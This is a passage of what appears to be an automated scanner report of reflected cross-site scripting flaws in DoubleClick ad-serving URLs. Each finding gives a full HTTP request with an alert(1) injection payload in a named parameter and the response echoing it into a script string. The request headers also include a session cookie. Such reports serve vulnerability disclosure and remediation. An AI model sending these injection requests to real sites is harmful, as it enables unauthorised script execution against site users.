This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3740.MSN/B5123509.8;sz=300x250;siteid=msn;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003O/53000000000034172.1?!&&PID=8108870&UIT=G&TargetID=20624992&AN=304826910&PG=INVIHR27e47"-alert(1)-"5c12fb84d15&ASID=526d9cac631c46728d1cd271a57cd5b5&destination=;ord=304826910? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 01:41:08 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5961

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,082 Template Name = 2. Banner Creative (Flash) - In Pa
...[SNIP]...

minV = 6;
FWH = ' width="300" height="250" ';
url = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003O/53000000000034172.1?!&&PID=8108870&UIT=G&TargetID=20624992&AN=304826910&PG=INVIHR27e47"-alert(1)-"5c12fb84d15&ASID=526d9cac631c46728d1cd271a57cd5b5&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/db/%2a/d%3B234278507%3B4-0%3B0%3B58143061%3B4307-300/250%3B40142779/40160566/1%3B%3B%7Eokv%3D%3Bpc%3D
...[SNIP]...

5.5. http://ad.doubleclick.net/adi/N3740.MSN/B5123509.8 [TargetID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3740.MSN/B5123509.8

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 38375"-alert(1)-"118ab6f547d was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3740.MSN/B5123509.8;sz=300x250;siteid=msn;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003O/53000000000034172.1?!&&PID=8108870&UIT=G&TargetID=2062499238375"-alert(1)-"118ab6f547d&AN=304826910&PG=INVIHR&ASID=526d9cac631c46728d1cd271a57cd5b5&destination=;ord=304826910? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 01:40:34 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5961

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,082 Template Name = 2. Banner Creative (Flash) - In Pa
...[SNIP]...
g_Film_300x250_V2.jpg";
minV = 6;
FWH = ' width="300" height="250" ';
url = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003O/53000000000034172.1?!&&PID=8108870&UIT=G&TargetID=2062499238375"-alert(1)-"118ab6f547d&AN=304826910&PG=INVIHR&ASID=526d9cac631c46728d1cd271a57cd5b5&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/db/%2a/d%3B234278507%3B4-0%3B0%3B58143061%3B4307-300/250%3B40142779/40160566/1
...[SNIP]...

5.6. http://ad.doubleclick.net/adi/N3740.MSN/B5123509.8 [UIT parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3740.MSN/B5123509.8

Issue detail

The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e0dca"-alert(1)-"d645eab062b was submitted in the UIT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3740.MSN/B5123509.8;sz=300x250;siteid=msn;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003O/53000000000034172.1?!&&PID=8108870&UIT=Ge0dca"-alert(1)-"d645eab062b&TargetID=20624992&AN=304826910&PG=INVIHR&ASID=526d9cac631c46728d1cd271a57cd5b5&destination=;ord=304826910? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 01:40:17 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5961

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,082 Template Name = 2. Banner Creative (Flash) - In Pa
...[SNIP]...
/2426847/1-Branding_Film_300x250_V2.jpg";
minV = 6;
FWH = ' width="300" height="250" ';
url = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003O/53000000000034172.1?!&&PID=8108870&UIT=Ge0dca"-alert(1)-"d645eab062b&TargetID=20624992&AN=304826910&PG=INVIHR&ASID=526d9cac631c46728d1cd271a57cd5b5&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/db/%2a/d%3B234278507%3B4-0%3B0%3B58143061%3B4307-300/250%3B4
...[SNIP]...

5.7. http://ad.doubleclick.net/adi/N3740.MSN/B5123509.8 [destination parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3740.MSN/B5123509.8

Issue detail

The value of the destination request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 257da"-alert(1)-"516683e8192 was submitted in the destination parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3740.MSN/B5123509.8;sz=300x250;siteid=msn;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003O/53000000000034172.1?!&&PID=8108870&UIT=G&TargetID=20624992&AN=304826910&PG=INVIHR&ASID=526d9cac631c46728d1cd271a57cd5b5&destination=257da"-alert(1)-"516683e8192 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5961
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 30 Jan 2011 01:41:45 GMT
Expires: Sun, 30 Jan 2011 01:41:45 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,082 Template Name = 2. Banner Creative (Flash) - In Pa
...[SNIP]...
= escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003O/53000000000034172.1?!&&PID=8108870&UIT=G&TargetID=20624992&AN=304826910&PG=INVIHR&ASID=526d9cac631c46728d1cd271a57cd5b5&destination=257da"-alert(1)-"516683e8192http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/db/%2a/d%3B234278507%3B4-0%3B0%3B58143061%3B4307-300/250%3B40142779/40160566/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://t.mookie1.co
...[SNIP]...

5.8. http://ad.doubleclick.net/adi/N3740.MSN/B5123509.8 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3740.MSN/B5123509.8

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ac034"-alert(1)-"a5858b7aca9 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3740.MSN/B5123509.8;sz=300x250;siteid=msn;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003O/53000000000034172.1?!ac034"-alert(1)-"a5858b7aca9&&PID=8108870&UIT=G&TargetID=20624992&AN=304826910&PG=INVIHR&ASID=526d9cac631c46728d1cd271a57cd5b5&destination=;ord=304826910? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 01:39:47 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5961

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,082 Template Name = 2. Banner Creative (Flash) - In Pa
...[SNIP]...
"http://s0.2mdn.net/2426847/1-Branding_Film_300x250_V2.jpg";
minV = 6;
FWH = ' width="300" height="250" ';
url = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003O/53000000000034172.1?!ac034"-alert(1)-"a5858b7aca9&&PID=8108870&UIT=G&TargetID=20624992&AN=304826910&PG=INVIHR&ASID=526d9cac631c46728d1cd271a57cd5b5&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/db/%2a/d%3B234278507%3B4-0%3B0%3B58143061
...[SNIP]...

5.9. http://ad.doubleclick.net/adi/N3973.MSN/B4412732.159 [TargetID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3973.MSN/B4412732.159

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e9279"-alert(1)-"f18c6157333 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3973.MSN/B4412732.159;sz=300x60;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00037/26000000000150232.1?!&&PID=8016549&UIT=G&TargetID=28253486e9279"-alert(1)-"f18c6157333&AN=420169787&PG=INVPC3&ASID=9d895293b9e448ef860f80a5ea38d6d2&destination=;ord=420169787? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 19:27:42 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6481

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
18k.jpg";
var minV = 8;
var FWH = ' width="300" height="60" ';
var url = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00037/26000000000150232.1?!&&PID=8016549&UIT=G&TargetID=28253486e9279"-alert(1)-"f18c6157333&AN=420169787&PG=INVPC3&ASID=9d895293b9e448ef860f80a5ea38d6d2&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/db/%2a/q%3B232242619%3B3-0%3B0%3B56133728%3B91-300/60%3B39947595/39965382/1%3B
...[SNIP]...

5.10. http://ad.doubleclick.net/adi/N4319.msn/B2087123.383 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4319.msn/B2087123.383

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 46184"-alert(1)-"1f112e5f159 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N4319.msn/B2087123.383;sz=728x90;;sz=728x90;ord=177637523?click=http://clk.redcated/goiframe/196246413.198101735/139941180/direct/01%3fhref=&46184"-alert(1)-"1f112e5f159=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/139941180/direct;;wi.728;hi.90/01?click=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 01:39:56 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4953

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
.net/click%3Bh%3Dv8/3a9f/f/6c/%2a/l%3B235359709%3B0-0%3B0%3B58334030%3B3454-728/90%3B39877168/39894955/1%3B%3B%7Esscs%3D%3fhttp://clk.atdmt.com/goiframe/196246413.198101735/139941180/direct/01%3fhref=&46184"-alert(1)-"1f112e5f159=1http%3a%2f%2fwww.nutrisystem.com/jsps_hmr/tracking/click.jsp%3Fiid%3D29572%26rURL%3D/webnoweeksoffernetworks");
var wmode = "opaque";
var bg = "same as SWF";
var dcallowscriptaccess = "never";

var o
...[SNIP]...

5.11. http://ad.doubleclick.net/adi/N4319.msn/B2087123.383 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4319.msn/B2087123.383

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 42cde"-alert(1)-"304992cdd17 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N4319.msn/B2087123.383;sz=728x90;;sz=728x90;ord=177637523?click=http://clk.redcated/goiframe/196246413.198101735/139941180/direct/01%3fhref=42cde"-alert(1)-"304992cdd17 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/139941180/direct;;wi.728;hi.90/01?click=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 01:39:37 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4916

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
k.net/click%3Bh%3Dv8/3a9f/7/69/%2a/l%3B235359709%3B0-0%3B0%3B58334030%3B3454-728/90%3B39877168/39894955/1%3B%3B%7Esscs%3D%3fhttp://clk.atdmt.com/goiframe/196246413.198101735/139941180/direct/01%3fhref=42cde"-alert(1)-"304992cdd17http://www.nutrisystem.com/jsps_hmr/tracking/click.jsp?iid=29572&rURL=/webnoweeksoffernetworks");
var wmode = "opaque";
var bg = "same as SWF";
var dcallowscriptaccess = "never";

var openWindow = "fal
...[SNIP]...

5.12. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903 [&PID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6036.149339.MICROSOFTONLINE/B5123903

Issue detail

The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb1fc"-alert(1)-"ab9deb67cba was submitted in the &PID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N6036.149339.MICROSOFTONLINE/B5123903;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/73000000000032314.1?!&&PID=8261482bb1fc"-alert(1)-"ab9deb67cba&UIT=G&TargetID=37486885&AN=1781205665&PG=NBCSAT&ASID=35822a3e79a24077bdcc19b1cd979a9d&destination=;ord=1781205665? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 14:49:08 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6678

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
0_Webinar-Analysis_300x250.gif";
var minV = 9;
var FWH = ' width="300" height="250" ';
var url = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/73000000000032314.1?!&&PID=8261482bb1fc"-alert(1)-"ab9deb67cba&UIT=G&TargetID=37486885&AN=1781205665&PG=NBCSAT&ASID=35822a3e79a24077bdcc19b1cd979a9d&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/dc/%2a/x%3B234266103%3B1-0%3B0%3B58044025%3B4307-300/
...[SNIP]...

5.13. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903 [AN parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6036.149339.MICROSOFTONLINE/B5123903

Issue detail

The value of the AN request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b3498"-alert(1)-"1afacfcce21 was submitted in the AN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N6036.149339.MICROSOFTONLINE/B5123903;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/73000000000032314.1?!&&PID=8261482&UIT=G&TargetID=37486885&AN=1781205665b3498"-alert(1)-"1afacfcce21&PG=NBCSAT&ASID=35822a3e79a24077bdcc19b1cd979a9d&destination=;ord=1781205665? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 14:50:26 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6697

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
minV = 9;
var FWH = ' width="300" height="250" ';
var url = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/73000000000032314.1?!&&PID=8261482&UIT=G&TargetID=37486885&AN=1781205665b3498"-alert(1)-"1afacfcce21&PG=NBCSAT&ASID=35822a3e79a24077bdcc19b1cd979a9d&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/dc/%2a/z%3B234265784%3B1-0%3B0%3B58044025%3B4307-300/250%3B39750649/39768436/2%3B%3B%7Esscs
...[SNIP]...

5.14. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903 [ASID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6036.149339.MICROSOFTONLINE/B5123903

Issue detail

The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ff0e2"-alert(1)-"cb65f1ae9c0 was submitted in the ASID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N6036.149339.MICROSOFTONLINE/B5123903;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/73000000000032314.1?!&&PID=8261482&UIT=G&TargetID=37486885&AN=1781205665&PG=NBCSAT&ASID=35822a3e79a24077bdcc19b1cd979a9dff0e2"-alert(1)-"cb65f1ae9c0&destination=;ord=1781205665? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 14:50:57 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6510

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
';
var url = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/73000000000032314.1?!&&PID=8261482&UIT=G&TargetID=37486885&AN=1781205665&PG=NBCSAT&ASID=35822a3e79a24077bdcc19b1cd979a9dff0e2"-alert(1)-"cb65f1ae9c0&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/dc/%2a/n%3B234266403%3B1-0%3B0%3B58044025%3B4307-300/250%3B38529150/38546907/1%3B%3B%7Esscs%3D%3fhttp://www.schwabat.com/offer/offerdirect.
...[SNIP]...

5.15. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903 [PG parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6036.149339.MICROSOFTONLINE/B5123903

Issue detail

The value of the PG request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 59795"-alert(1)-"7c45a99b0fe was submitted in the PG parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N6036.149339.MICROSOFTONLINE/B5123903;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/73000000000032314.1?!&&PID=8261482&UIT=G&TargetID=37486885&AN=1781205665&PG=NBCSAT59795"-alert(1)-"7c45a99b0fe&ASID=35822a3e79a24077bdcc19b1cd979a9d&destination=;ord=1781205665? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 19:27:52 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6678

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...

var FWH = ' width="300" height="250" ';
